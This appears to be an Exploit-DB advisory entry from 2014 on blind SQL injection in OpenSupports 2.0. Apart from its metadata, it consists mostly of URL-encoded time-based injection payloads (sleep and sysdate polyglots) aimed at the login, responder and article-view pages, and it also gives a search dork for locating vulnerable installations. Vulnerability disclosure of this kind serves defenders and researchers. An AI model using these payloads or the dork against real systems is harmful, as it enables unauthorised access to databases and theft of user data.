OpenSupports 2.0 - Blind SQL Injection

Author: indoushka
type: webapps
platform: php
port: 
date_added: 2014-03-17  
date_updated: 2014-03-17  
verified: 1  
codes: OSVDB-104112;OSVDB-104104;OSVDB-104103  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt32500/screen-shot-2014-03-17-at-113118.png  
application_url: http://www.exploit-db.comOpensupports_v2_EN.rar  

raw file: 32330.txt  

Open Support Blind SQL Injection v2.0 Vulnerability
===================================================
Author indoushka
=================
vendor :http://www.opensupports.com/files/Opensupports_v2_EN.rar
=================
# Dork : Power by OpenSupports © 2009 - 2014. All Rights reserved


This vulnerability affects /support/login.php

emailcorreoelectronico=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pass=g00dPa%24%24w0rD&Submit2=Login



This vulnerability affects /support/responder.php.

idarticulo=&name=&staff=no&Submit=Send&text_content=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/



This vulnerability affects /support/verarticulo.php.

/support/verarticulo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/